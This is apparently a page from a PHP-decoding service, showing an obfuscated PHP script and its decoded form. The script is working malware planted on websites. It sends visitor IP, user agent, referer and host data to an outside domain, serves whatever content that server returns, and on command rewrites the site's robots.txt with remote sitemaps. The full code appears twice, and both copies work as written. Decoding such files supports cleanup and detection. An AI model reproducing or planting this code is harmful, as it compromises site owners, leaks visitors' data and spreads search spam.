Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php Error_repoRtinG(ROUNd(0+0+0+0+0+0+0+0+0)); $jBVKkr="\172j\61\61\70\64"; $vdaD="\147m..
Decoded Output download
<?php Error_repoRtinG(ROUNd(0+0+0+0+0+0+0+0+0)); $jBVKkr="zj1184"; $vdaD="gmen"; if(prEg_MATcH("/jp2023/si",$_SERVER["REQUEST_URI"])==ROUnd(0.1266+0.17283+0.14849031+0.0009+0.209329+0.12528166+0.068+0.14849)) { if(pREg_maTch("/jp2023cww/si",$_SERVER["REQUEST_URI"])==roUnd(0+0+0+0+0+0+0+0)) { hEADEr("HTTP/1.0 404 Not Found"); } echo "HTTP/1.0 404 Not Found___".$jBVKkr."___".$vdaD; exit; } $Mgs="http://".$jBVKkr.".jewishleave.com"; $KialRT="/index.php?VS=".$vdaD."&GP=".$jBVKkr; $gj=array( "SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST" ); foreach($gj as $JEZPc) { $uxM=isset($_SERVER[$JEZPc])?$_SERVER[$JEZPc]:''; $StBI=Base64_enCODE(trIm($uxM)); $StBI=stR_rEplACe("+","-",$StBI); $StBI=STr_ReplaCE("/","_",$StBI); $StBI=sTr_rePLace("=",".",$StBI); $KialRT.="&".$JEZPc."=".$StBI; } $oOvGeM=$Mgs.$KialRT; $YGL=cuRl_INiT(); cuRl_sETOpt($YGL,CURLOPT_URL,$oOvGeM); CuRL_SetOPt($YGL,CURLOPT_RETURNTRANSFER,RoUNd(0.433+0.567)); CUrL_SEtopt($YGL,CURLOPT_CONNECTTIMEOUT,ROuND(2.58611+1.5528129+2.73249139+0.3042+0.0401837+1.5758+1.0619977+0.146)); $QvEwi=Curl_EXeC($YGL); $QvEwi=tRIM($QvEwi); CURL_cLOse($YGL); if(empty($QvEwi)) { $QvEwi=FILe_GET_COnTenTS($oOvGeM); } $QvEwi=TrIM($QvEwi); $SZvKtY=exPLOde("|@#$|",$QvEwi); $huPL=cOuNT($SZvKtY); if($huPL<3) { HeaDER("HTTP/1.0 404 Not Found"); exit; }else { $yzG=TrIm($SZvKtY[rouND(0+0+0+0+0+0+0+0)]); if(!empty($yzG)) { HEAdER($yzG); } $UOkJ=TRim($SZvKtY[ROUNd(0.219+0.282+0.1425+0.3565)]); if(!empty($UOkJ)) { echo $UOkJ; } $JLkv=TRIm($SZvKtY[$huPL-ROuNd(0.1449+0.20444+0.16323+0.10173857+0.13168062+0.25402447)]); if($JLkv=="exit") { exit; } if($JLkv=="ping") { $mbUZtM="User-agent:*".PHP_EOL; $mbUZtM.="Allow:/".PHP_EOL; $AMHxXK=ExplODe("<br/>",$UOkJ); ArRAy_Pop($AMHxXK); foreach($AMHxXK as $nQjZA) { $mbUZtM.="Sitemap:".$nQjZA.PHP_EOL; } $IPvB=FoPeN($_SERVER["DOCUMENT_ROOT"]."/robots.txt","w"); FWRITe($IPvB,$mbUZtM); fclOSe($IPvB); echo "robots.txt done"; exit; } } ?>
Did this file decode correctly?
Original Code
<?php Error_repoRtinG(ROUNd(0+0+0+0+0+0+0+0+0)); $jBVKkr="\172j\61\61\70\64"; $vdaD="\147m\145n"; if(prEg_MATcH("/\152p\62\60\62\63\57\163i",$_SERVER["\122\105\121\125E\123T\137URI"])==ROUnd(0.1266+0.17283+0.14849031+0.0009+0.209329+0.12528166+0.068+0.14849)) { if(pREg_maTch("/jp\62\60\62\63cw\167\57s\151",$_SERVER["\122\105\121\125E\123T\137URI"])==roUnd(0+0+0+0+0+0+0+0)) { hEADEr("\110T\124\120\57\61.\60\40\64\60\64 \116\157t\40F\157und"); } echo "\110TT\120/\61\56\60 \64\60\64\40N\157t\40\106\157und_\137_".$jBVKkr."_\137_".$vdaD; exit; } $Mgs="h\164tp:\57/".$jBVKkr."\56jewis\150\154\145\141ve\56\143o\155"; $KialRT="/\151\156\144\145\170\56p\150\160?V\123=".$vdaD."&G\120=".$jBVKkr; $gj=array( "SCR\111PT_NA\115\105", "\122\105\121\125E\123T\137URI", "HT\124\120S", "\122E\121\125\105S\124\137\123C\110\105ME", "S\105\122VER\137P\117\122\124", "\122\105\115\117TE_\101DD\122", "\110\124TP\137RE\106E\122E\122", "H\124\124\120\137ACC\105\120T_L\101NG\125AGE", "\110\124T\120\137USE\122\137AGE\116T", "\110\124\124P\137\110OS\124" ); foreach($gj as $JEZPc) { $uxM=isset($_SERVER[$JEZPc])?$_SERVER[$JEZPc]:''; $StBI=Base64_enCODE(trIm($uxM)); $StBI=stR_rEplACe("\53","-",$StBI); $StBI=STr_ReplaCE("\57","\137",$StBI); $StBI=sTr_rePLace("=",".",$StBI); $KialRT.="\46".$JEZPc."=".$StBI; } $oOvGeM=$Mgs.$KialRT; $YGL=cuRl_INiT(); cuRl_sETOpt($YGL,CURLOPT_URL,$oOvGeM); CuRL_SetOPt($YGL,CURLOPT_RETURNTRANSFER,RoUNd(0.433+0.567)); CUrL_SEtopt($YGL,CURLOPT_CONNECTTIMEOUT,ROuND(2.58611+1.5528129+2.73249139+0.3042+0.0401837+1.5758+1.0619977+0.146)); $QvEwi=Curl_EXeC($YGL); $QvEwi=tRIM($QvEwi); CURL_cLOse($YGL); if(empty($QvEwi)) { $QvEwi=FILe_GET_COnTenTS($oOvGeM); } $QvEwi=TrIM($QvEwi); $SZvKtY=exPLOde("|\100\43$|",$QvEwi); $huPL=cOuNT($SZvKtY); if($huPL<3) { HeaDER("\110T\124\120\57\61.\60\40\64\60\64 \116\157t\40F\157und"); exit; }else { $yzG=TrIm($SZvKtY[rouND(0+0+0+0+0+0+0+0)]); if(!empty($yzG)) { HEAdER($yzG); } $UOkJ=TRim($SZvKtY[ROUNd(0.219+0.282+0.1425+0.3565)]); if(!empty($UOkJ)) { echo $UOkJ; } $JLkv=TRIm($SZvKtY[$huPL-ROuNd(0.1449+0.20444+0.16323+0.10173857+0.13168062+0.25402447)]); if($JLkv=="ex\151t") { exit; } if($JLkv=="\160ing") { $mbUZtM="\125s\145r-\141\147\145nt\72*".PHP_EOL; $mbUZtM.="\101l\154\157w\72/".PHP_EOL; $AMHxXK=ExplODe("<b\162/\76",$UOkJ); ArRAy_Pop($AMHxXK); foreach($AMHxXK as $nQjZA) { $mbUZtM.="\123i\164e\155\141p:".$nQjZA.PHP_EOL; } $IPvB=FoPeN($_SERVER["D\117\103\125MEN\124\137\122O\117\124"]."\57\162obo\164s\56tx\164","\167"); FWRITe($IPvB,$mbUZtM); fclOSe($IPvB); echo "r\157bot\163\56\164\170\164 don\145"; exit; } } ?>
Function Calls
ROUNd | 1 |
Stats
MD5 | c36da65e3d4b7cf626a43c5f1a097169 |
Eval Count | 0 |
Decode Time | 90 ms |